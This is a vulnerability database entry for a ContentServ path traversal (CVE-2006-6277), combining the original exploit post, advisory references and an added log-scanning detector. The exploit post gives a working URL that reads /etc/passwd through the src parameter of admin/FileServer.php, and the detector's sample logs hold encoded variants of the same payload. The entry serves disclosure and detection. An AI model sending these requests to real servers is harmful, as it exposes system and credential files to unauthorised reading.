ContentServ 'FileServer.php' Directory Traversal Vulnerability

Vulnerability ID: 1111696
Vulnerability type: Path traversal
Published: 2006-12-01
Updated: 2006-12-06
CVE ID: CVE-2006-6277
CNNVD-ID: CNNVD-200612-047
Platform: PHP
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/2878
https://cxsecurity.com/issue/WLB-2006120060
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-047
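|Vulnerability details
A directory traversal vulnerability exists in admin/FileServer.php in ContentServ. A remote attacker can read arbitrary files by supplying a src parameter that contains .. sequences.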
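
A defender-side check for the request pattern described above, as an added example that is not part of the original entry or of ContentServ: it scans web-server access logs for requests to admin/FileServer.php whose src parameter decodes to a path containing a .. segment. The log lines are constructed samples; the combined log format and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format assumed).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Dec/2006:10:00:01 +0000] "GET /contentserv/4.2/admin/FileServer.php?src=images/logo.gif HTTP/1.1" 200 5120
203.0.113.9 - - [01/Dec/2006:10:00:07 +0000] "GET /contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd HTTP/1.1" 200 1432
203.0.113.9 - - [01/Dec/2006:10:00:09 +0000] "GET /contentserv/4.2/admin/FileServer.php?src=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1432
203.0.113.9 - - [01/Dec/2006:10:00:12 +0000] "GET /contentserv/4.2/admin/FileServer.php?src=%252e%252e%252fconfig.php HTTP/1.1" 404 210
198.51.100.2 - - [01/Dec/2006:10:01:00 +0000] "GET /contentserv/4.2/index.php?src=../x HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(src):
    """True if the decoded value has a '..' path segment (either slash style)."""
    return ".." in re.split(r"[\\/]+", decode_fully(src))


def find_traversal_requests(log_text):
    """Return (client, decoded_src, status) for suspicious FileServer.php hits."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/admin/fileserver.php"):
            continue
        # parse_qs decodes one layer; decode_fully handles any remaining ones.
        for src in parse_qs(url.query, keep_blank_values=True).get("src", []):
            if is_traversal(src):
                hits.append((client, decode_fully(src), int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves priority in triage, since it indicates the server returned content for the traversed path.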
|Exploit
ContentServ again (still) features remote reading of arbitrary files
====================================================================

ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continuously enhance our products and services.[...]"

Ok.

Now for the real fun, remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html


Still with me? Ok. Let's forget the SQL injections for a moment, what if we try:
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd

# milw0rm.com [2006-12-01]
|References

Source: BID
Name: 21369
Link: http://www.securityfocus.com/bid/21369
Source: BUGTRAQ
Name: 20061130contentserv4.x
Link: http://www.securityfocus.com/archive/1/archive/1/453130/100/0/threaded
Source: XF
Name: contentserv-fileserver-directory-traversal(30648)
Link: http://xforce.iss.net/xforce/xfdb/30648
Source: VUPEN
Name: ADV-2006-4808
Link: http://www.frsirt.com/english/advisories/2006/4808
Source: SREASON
Name: 1989
Link: http://securityreason.com/securityalert/1989
Source: SECUNIA
Name: 23158
Link: http://secunia.com/advisories/23158